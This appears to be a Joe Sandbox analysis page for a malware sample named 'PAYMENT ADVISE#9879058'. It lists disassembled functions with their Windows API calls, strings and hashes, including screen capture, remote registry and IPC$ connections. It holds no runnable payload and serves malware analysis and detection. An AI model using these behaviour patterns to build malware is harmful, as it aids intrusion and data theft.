                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                          • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                          • StringFromIID.OLE32(?,?), ref: 0047D7F0
                          • CoTaskMemFree.OLE32(?), ref: 0047D80A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: FreeFromStringTask_wcslen$_wcscpy
                          • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                          • API String ID: 2485709727-934586222
                          • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                          • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                          • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                          • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                          Function 0045DB3E Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 181COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                          • String ID: HH
                          • API String ID: 3381189665-2761332787
                          • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                          • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                          • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                          • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                          Function 00434506 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(00000000), ref: 00434585
                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                          • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                          • SelectObject.GDI32(00000000,?), ref: 004345A9
                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                          • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                          • String ID: (
                          • API String ID: 3300687185-3887548279
                          • Opcode ID: a49f41e91dac5baa2c50b775dc8de30f0d01d64d4146e99f951c4697ae3d27a6
                          • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                          • Opcode Fuzzy Hash: a49f41e91dac5baa2c50b775dc8de30f0d01d64d4146e99f951c4697ae3d27a6
                          • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                          Function 0045E41B Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 150COMMON
                          Download Yara Rule
                          APIs
                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                          • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                          • __swprintf.LIBCMT ref: 0045E4D9
                          • _printf.LIBCMT ref: 0045E595
                          • _printf.LIBCMT ref: 0045E5B7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: LoadString_printf$__swprintf_wcslen
                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                          • API String ID: 3590180749-2894483878
                          • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                          • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                          • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                          • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                          Function 0046F90E Relevance: 21.1, APIs: 14, Instructions: 147windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                          • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                          • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                          • DeleteObject.GDI32(?), ref: 0046F950
                          • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                          • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                          • DeleteObject.GDI32(?), ref: 0046F9CF
                          • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                          • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                          • DestroyIcon.USER32(?), ref: 0046FA4F
                          • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                          • DeleteObject.GDI32(?), ref: 0046FA68
                          • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                          • String ID:
                          • API String ID: 3412594756-0
                          • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                          • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                          • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                          • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                          Function 0045D971 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 140COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                            • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                          • GetDriveTypeW.KERNEL32 ref: 0045DA30
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: SendString$_wcslen$BuffCharDriveLowerType
                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                          • API String ID: 4013263488-4113822522
                          • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                          • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                          • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                          • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                          Function 00435A35 Relevance: 21.1, APIs: 14, Instructions: 136timeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                          • String ID:
                          • API String ID: 228034949-0
                          • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                          • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                          • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                          • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                          Function 004334CA Relevance: 21.1, APIs: 14, Instructions: 132filecommemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                          • GlobalLock.KERNEL32(00000000), ref: 00433523
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                          • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                          • GlobalFree.KERNEL32(00000000), ref: 0043357B
                          • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                          • DeleteObject.GDI32(?), ref: 00433603
                          • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                          • String ID:
                          • API String ID: 3969911579-0
                          • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                          • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                          • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                          • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                          Function 00445A77 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 73windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32 ref: 00445A8D
                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                          • __wcsicoll.LIBCMT ref: 00445AC4
                          • __wcsicoll.LIBCMT ref: 00445AE0
                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __wcsicoll$ClassMessageNameParentSend
                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                          • API String ID: 3125838495-3381328864
                          • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                          • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                          • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                          • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                          Function 00479921 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 314COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CopyVariant$ErrorLast
                          • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                          • API String ID: 2286883814-4206948668
                          • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                          • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                          • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                          • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                          Function 00475D8B Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 194COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                            • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                          • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                          • _wcscpy.LIBCMT ref: 00475F18
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                          • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                          • API String ID: 3052893215-4176887700
                          • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                          • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                          • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                          • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                          Function 004582BF Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 165registryCOMMON
                          Download Yara Rule
                          APIs
                          • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                          • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                          • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                          • RegQueryValueExW.ADVAPI32 ref: 00458381
                          • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                          • RegQueryValueExW.ADVAPI32 ref: 004583E8
                          • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                            • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                          • RegCloseKey.ADVAPI32(?), ref: 004584BA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                          • String ID: Version$\TypeLib$interface\
                          • API String ID: 656856066-939221531
                          • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                          • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                          • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                          • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                          Function 0045E62E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 155COMMON
                          Download Yara Rule
                          APIs
                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                          • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                          • __swprintf.LIBCMT ref: 0045E6EE
                          • _printf.LIBCMT ref: 0045E7A9
                          • _printf.LIBCMT ref: 0045E7D2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: LoadString_printf$__swprintf_wcslen
                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 3590180749-2354261254
                          • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                          • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                          • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                          • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                          Function 00452E2A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 154COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __swprintf_wcscpy$__i64tow__itow
                          • String ID: %.15g$0x%p$False$True
                          • API String ID: 3038501623-2263619337
                          • Opcode ID: 8ea6ddc996ebef1c7950de8ae128e0744c87d41cbaff66ecd09c9901680fa350
                          • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                          • Opcode Fuzzy Hash: 8ea6ddc996ebef1c7950de8ae128e0744c87d41cbaff66ecd09c9901680fa350
                          • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                          Function 004580E1 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 136registryshareCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                          • _memset.LIBCMT ref: 00458194
                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                          • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                          • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                          • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                          • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                          • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                          • API String ID: 2255324689-22481851
